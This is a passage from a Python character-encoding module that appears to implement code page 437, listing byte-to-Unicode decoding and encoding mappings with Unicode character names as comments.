0x008e: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x008f: 0x00c5, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00e6, # LATIN SMALL LIGATURE AE
0x0092: 0x00c6, # LATIN CAPITAL LIGATURE AE
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x0095: 0x00f2, # LATIN SMALL LETTER O WITH GRAVE
0x0096: 0x00fb, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x0097: 0x00f9, # LATIN SMALL LETTER U WITH GRAVE
0x0098: 0x00ff, # LATIN SMALL LETTER Y WITH DIAERESIS
0x0099: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00a2, # CENT SIGN
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00a5, # YEN SIGN
0x009e: 0x20a7, # PESETA SIGN
0x009f: 0x0192, # LATIN SMALL LETTER F WITH HOOK
0x00a0: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x00a1: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00f1, # LATIN SMALL LETTER N WITH TILDE
0x00a5: 0x00d1, # LATIN CAPITAL LETTER N WITH TILDE
0x00a6: 0x00aa, # FEMININE ORDINAL INDICATOR
0x00a7: 0x00ba, # MASCULINE ORDINAL INDICATOR
0x00a8: 0x00bf, # INVERTED QUESTION MARK
0x00a9: 0x2310, # REVERSED NOT SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00a1, # INVERTED EXCLAMATION MARK
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03b1, # GREEK SMALL LETTER ALPHA
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x00e3: 0x03c0, # GREEK SMALL LETTER PI
0x00e4: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x00e5: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x03c4, # GREEK SMALL LETTER TAU
0x00e8: 0x03a6, # GREEK CAPITAL LETTER PHI
0x00e9: 0x0398, # GREEK CAPITAL LETTER THETA
0x00ea: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x00eb: 0x03b4, # GREEK SMALL LETTER DELTA
0x00ec: 0x221e, # INFINITY
0x00ed: 0x03c6, # GREEK SMALL LETTER PHI
0x00ee: 0x03b5, # GREEK SMALL LETTER EPSILON
0x00ef: 0x2229, # INTERSECTION
0x00f0: 0x2261, # IDENTICAL TO
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x2320, # TOP HALF INTEGRAL
0x00f5: 0x2321, # BOTTOM HALF INTEGRAL
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
'\x00' # 0x0000 -> NULL
'\x01' # 0x0001 -> START OF HEADING
'\x02' # 0x0002 -> START OF TEXT
'\x03' # 0x0003 -> END OF TEXT
'\x04' # 0x0004 -> END OF TRANSMISSION
'\x05' # 0x0005 -> ENQUIRY
'\x06' # 0x0006 -> ACKNOWLEDGE
'\x07' # 0x0007 -> BELL
'\x08' # 0x0008 -> BACKSPACE
'\t' # 0x0009 -> HORIZONTAL TABULATION
'\n' # 0x000a -> LINE FEED
'\x0b' # 0x000b -> VERTICAL TABULATION
'\x0c' # 0x000c -> FORM FEED
'\r' # 0x000d -> CARRIAGE RETURN
'\x0e' # 0x000e -> SHIFT OUT
'\x0f' # 0x000f -> SHIFT IN
'\x10' # 0x0010 -> DATA LINK ESCAPE
'\x11' # 0x0011 -> DEVICE CONTROL ONE
'\x12' # 0x0012 -> DEVICE CONTROL TWO
'\x13' # 0x0013 -> DEVICE CONTROL THREE
'\x14' # 0x0014 -> DEVICE CONTROL FOUR
'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x0016 -> SYNCHRONOUS IDLE
'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
'\x18' # 0x0018 -> CANCEL
'\x19' # 0x0019 -> END OF MEDIUM
'\x1a' # 0x001a -> SUBSTITUTE
'\x1b' # 0x001b -> ESCAPE
'\x1c' # 0x001c -> FILE SEPARATOR
'\x1d' # 0x001d -> GROUP SEPARATOR
'\x1e' # 0x001e -> RECORD SEPARATOR
'\x1f' # 0x001f -> UNIT SEPARATOR
' ' # 0x0020 -> SPACE
'!' # 0x0021 -> EXCLAMATION MARK
'"' # 0x0022 -> QUOTATION MARK
'#' # 0x0023 -> NUMBER SIGN
'$' # 0x0024 -> DOLLAR SIGN
'%' # 0x0025 -> PERCENT SIGN
'&' # 0x0026 -> AMPERSAND
"'" # 0x0027 -> APOSTROPHE
'(' # 0x0028 -> LEFT PARENTHESIS
')' # 0x0029 -> RIGHT PARENTHESIS
'*' # 0x002a -> ASTERISK
'+' # 0x002b -> PLUS SIGN
',' # 0x002c -> COMMA
'-' # 0x002d -> HYPHEN-MINUS
'.' # 0x002e -> FULL STOP
'/' # 0x002f -> SOLIDUS
'0' # 0x0030 -> DIGIT ZERO
'1' # 0x0031 -> DIGIT ONE
'2' # 0x0032 -> DIGIT TWO
'3' # 0x0033 -> DIGIT THREE
'4' # 0x0034 -> DIGIT FOUR
'5' # 0x0035 -> DIGIT FIVE
'6' # 0x0036 -> DIGIT SIX
'7' # 0x0037 -> DIGIT SEVEN
'8' # 0x0038 -> DIGIT EIGHT
'9' # 0x0039 -> DIGIT NINE
':' # 0x003a -> COLON
';' # 0x003b -> SEMICOLON
'<' # 0x003c -> LESS-THAN SIGN
'=' # 0x003d -> EQUALS SIGN
'>' # 0x003e -> GREATER-THAN SIGN
'?' # 0x003f -> QUESTION MARK
'@' # 0x0040 -> COMMERCIAL AT
'A' # 0x0041 -> LATIN CAPITAL LETTER A
'B' # 0x0042 -> LATIN CAPITAL LETTER B
'C' # 0x0043 -> LATIN CAPITAL LETTER C
'D' # 0x0044 -> LATIN CAPITAL LETTER D
'E' # 0x0045 -> LATIN CAPITAL LETTER E
'F' # 0x0046 -> LATIN CAPITAL LETTER F
'G' # 0x0047 -> LATIN CAPITAL LETTER G
'H' # 0x0048 -> LATIN CAPITAL LETTER H
'I' # 0x0049 -> LATIN CAPITAL LETTER I
'J' # 0x004a -> LATIN CAPITAL LETTER J
'K' # 0x004b -> LATIN CAPITAL LETTER K
'L' # 0x004c -> LATIN CAPITAL LETTER L
'M' # 0x004d -> LATIN CAPITAL LETTER M
'N' # 0x004e -> LATIN CAPITAL LETTER N
'O' # 0x004f -> LATIN CAPITAL LETTER O
'P' # 0x0050 -> LATIN CAPITAL LETTER P
'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
'R' # 0x0052 -> LATIN CAPITAL LETTER R
'S' # 0x0053 -> LATIN CAPITAL LETTER S
'T' # 0x0054 -> LATIN CAPITAL LETTER T
'U' # 0x0055 -> LATIN CAPITAL LETTER U
'V' # 0x0056 -> LATIN CAPITAL LETTER V
'W' # 0x0057 -> LATIN CAPITAL LETTER W
'X' # 0x0058 -> LATIN CAPITAL LETTER X
'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
'Z' # 0x005a -> LATIN CAPITAL LETTER Z
'[' # 0x005b -> LEFT SQUARE BRACKET
'\\' # 0x005c -> REVERSE SOLIDUS
']' # 0x005d -> RIGHT SQUARE BRACKET
'^' # 0x005e -> CIRCUMFLEX ACCENT
'_' # 0x005f -> LOW LINE
'`' # 0x0060 -> GRAVE ACCENT
'a' # 0x0061 -> LATIN SMALL LETTER A
'b' # 0x0062 -> LATIN SMALL LETTER B
'c' # 0x0063 -> LATIN SMALL LETTER C
'd' # 0x0064 -> LATIN SMALL LETTER D
'e' # 0x0065 -> LATIN SMALL LETTER E
'f' # 0x0066 -> LATIN SMALL LETTER F
'g' # 0x0067 -> LATIN SMALL LETTER G
'h' # 0x0068 -> LATIN SMALL LETTER H
'i' # 0x0069 -> LATIN SMALL LETTER I
'j' # 0x006a -> LATIN SMALL LETTER J
'k' # 0x006b -> LATIN SMALL LETTER K
'l' # 0x006c -> LATIN SMALL LETTER L
'm' # 0x006d -> LATIN SMALL LETTER M
'n' # 0x006e -> LATIN SMALL LETTER N
'o' # 0x006f -> LATIN SMALL LETTER O
'p' # 0x0070 -> LATIN SMALL LETTER P
'q' # 0x0071 -> LATIN SMALL LETTER Q
'r' # 0x0072 -> LATIN SMALL LETTER R
's' # 0x0073 -> LATIN SMALL LETTER S
't' # 0x0074 -> LATIN SMALL LETTER T
'u' # 0x0075 -> LATIN SMALL LETTER U
'v' # 0x0076 -> LATIN SMALL LETTER V
'w' # 0x0077 -> LATIN SMALL LETTER W
'x' # 0x0078 -> LATIN SMALL LETTER X
'y' # 0x0079 -> LATIN SMALL LETTER Y
'z' # 0x007a -> LATIN SMALL LETTER Z
'{' # 0x007b -> LEFT CURLY BRACKET
'|' # 0x007c -> VERTICAL LINE
'}' # 0x007d -> RIGHT CURLY BRACKET
'~' # 0x007e -> TILDE
'\x7f' # 0x007f -> DELETE
'\xc7' # 0x0080 -> LATIN CAPITAL LETTER C WITH CEDILLA
'\xfc' # 0x0081 -> LATIN SMALL LETTER U WITH DIAERESIS
'\xe9' # 0x0082 -> LATIN SMALL LETTER E WITH ACUTE
'\xe2' # 0x0083 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\xe4' # 0x0084 -> LATIN SMALL LETTER A WITH DIAERESIS
'\xe0' # 0x0085 -> LATIN SMALL LETTER A WITH GRAVE
'\xe5' # 0x0086 -> LATIN SMALL LETTER A WITH RING ABOVE
'\xe7' # 0x0087 -> LATIN SMALL LETTER C WITH CEDILLA
'\xea' # 0x0088 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
'\xeb' # 0x0089 -> LATIN SMALL LETTER E WITH DIAERESIS
'\xe8' # 0x008a -> LATIN SMALL LETTER E WITH GRAVE
'\xef' # 0x008b -> LATIN SMALL LETTER I WITH DIAERESIS
'\xee' # 0x008c -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\xec' # 0x008d -> LATIN SMALL LETTER I WITH GRAVE
'\xc4' # 0x008e -> LATIN CAPITAL LETTER A WITH DIAERESIS
'\xc5' # 0x008f -> LATIN CAPITAL LETTER A WITH RING ABOVE
'\xc9' # 0x0090 -> LATIN CAPITAL LETTER E WITH ACUTE
'\xe6' # 0x0091 -> LATIN SMALL LIGATURE AE
'\xc6' # 0x0092 -> LATIN CAPITAL LIGATURE AE
'\xf4' # 0x0093 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\xf6' # 0x0094 -> LATIN SMALL LETTER O WITH DIAERESIS
'\xf2' # 0x0095 -> LATIN SMALL LETTER O WITH GRAVE
'\xfb' # 0x0096 -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xf9' # 0x0097 -> LATIN SMALL LETTER U WITH GRAVE
'\xff' # 0x0098 -> LATIN SMALL LETTER Y WITH DIAERESIS
'\xd6' # 0x0099 -> LATIN CAPITAL LETTER O WITH DIAERESIS
'\xdc' # 0x009a -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\xa2' # 0x009b -> CENT SIGN
'\xa3' # 0x009c -> POUND SIGN
'\xa5' # 0x009d -> YEN SIGN
'\u20a7' # 0x009e -> PESETA SIGN
'\u0192' # 0x009f -> LATIN SMALL LETTER F WITH HOOK
'\xe1' # 0x00a0 -> LATIN SMALL LETTER A WITH ACUTE
'\xed' # 0x00a1 -> LATIN SMALL LETTER I WITH ACUTE
'\xf3' # 0x00a2 -> LATIN SMALL LETTER O WITH ACUTE
'\xfa' # 0x00a3 -> LATIN SMALL LETTER U WITH ACUTE
'\xf1' # 0x00a4 -> LATIN SMALL LETTER N WITH TILDE
'\xd1' # 0x00a5 -> LATIN CAPITAL LETTER N WITH TILDE
'\xaa' # 0x00a6 -> FEMININE ORDINAL INDICATOR
'\xba' # 0x00a7 -> MASCULINE ORDINAL INDICATOR
'\xbf' # 0x00a8 -> INVERTED QUESTION MARK
'\u2310' # 0x00a9 -> REVERSED NOT SIGN
'\xac' # 0x00aa -> NOT SIGN
'\xbd' # 0x00ab -> VULGAR FRACTION ONE HALF
'\xbc' # 0x00ac -> VULGAR FRACTION ONE QUARTER
'\xa1' # 0x00ad -> INVERTED EXCLAMATION MARK
'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
'\u2591' # 0x00b0 -> LIGHT SHADE
'\u2592' # 0x00b1 -> MEDIUM SHADE
'\u2593' # 0x00b2 -> DARK SHADE
'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
'\u2561' # 0x00b5 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
'\u2562' # 0x00b6 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
'\u2556' # 0x00b7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
'\u2555' # 0x00b8 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
'\u255c' # 0x00bd -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
'\u255b' # 0x00be -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
'\u255e' # 0x00c6 -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
'\u255f' # 0x00c7 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
'\u2567' # 0x00cf -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
'\u2568' # 0x00d0 -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
'\u2564' # 0x00d1 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
'\u2565' # 0x00d2 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
'\u2559' # 0x00d3 -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
'\u2558' # 0x00d4 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
'\u2552' # 0x00d5 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
'\u2553' # 0x00d6 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
'\u256b' # 0x00d7 -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
'\u256a' # 0x00d8 -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
'\u2588' # 0x00db -> FULL BLOCK
'\u2584' # 0x00dc -> LOWER HALF BLOCK
'\u258c' # 0x00dd -> LEFT HALF BLOCK
'\u2590' # 0x00de -> RIGHT HALF BLOCK
'\u2580' # 0x00df -> UPPER HALF BLOCK
'\u03b1' # 0x00e0 -> GREEK SMALL LETTER ALPHA
'\xdf' # 0x00e1 -> LATIN SMALL LETTER SHARP S
'\u0393' # 0x00e2 -> GREEK CAPITAL LETTER GAMMA
'\u03c0' # 0x00e3 -> GREEK SMALL LETTER PI
'\u03a3' # 0x00e4 -> GREEK CAPITAL LETTER SIGMA
'\u03c3' # 0x00e5 -> GREEK SMALL LETTER SIGMA
'\xb5' # 0x00e6 -> MICRO SIGN
'\u03c4' # 0x00e7 -> GREEK SMALL LETTER TAU
'\u03a6' # 0x00e8 -> GREEK CAPITAL LETTER PHI
'\u0398' # 0x00e9 -> GREEK CAPITAL LETTER THETA
'\u03a9' # 0x00ea -> GREEK CAPITAL LETTER OMEGA
'\u03b4' # 0x00eb -> GREEK SMALL LETTER DELTA
'\u221e' # 0x00ec -> INFINITY
'\u03c6' # 0x00ed -> GREEK SMALL LETTER PHI
'\u03b5' # 0x00ee -> GREEK SMALL LETTER EPSILON
'\u2229' # 0x00ef -> INTERSECTION
'\u2261' # 0x00f0 -> IDENTICAL TO
'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
'\u2265' # 0x00f2 -> GREATER-THAN OR EQUAL TO
'\u2264' # 0x00f3 -> LESS-THAN OR EQUAL TO
'\u2320' # 0x00f4 -> TOP HALF INTEGRAL
'\u2321' # 0x00f5 -> BOTTOM HALF INTEGRAL
'\xf7' # 0x00f6 -> DIVISION SIGN
'\u2248' # 0x00f7 -> ALMOST EQUAL TO
'\xb0' # 0x00f8 -> DEGREE SIGN
'\u2219' # 0x00f9 -> BULLET OPERATOR
'\xb7' # 0x00fa -> MIDDLE DOT
'\u221a' # 0x00fb -> SQUARE ROOT
'\u207f' # 0x00fc -> SUPERSCRIPT LATIN SMALL LETTER N
'\xb2' # 0x00fd -> SUPERSCRIPT TWO
'\u25a0' # 0x00fe -> BLACK SQUARE
'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
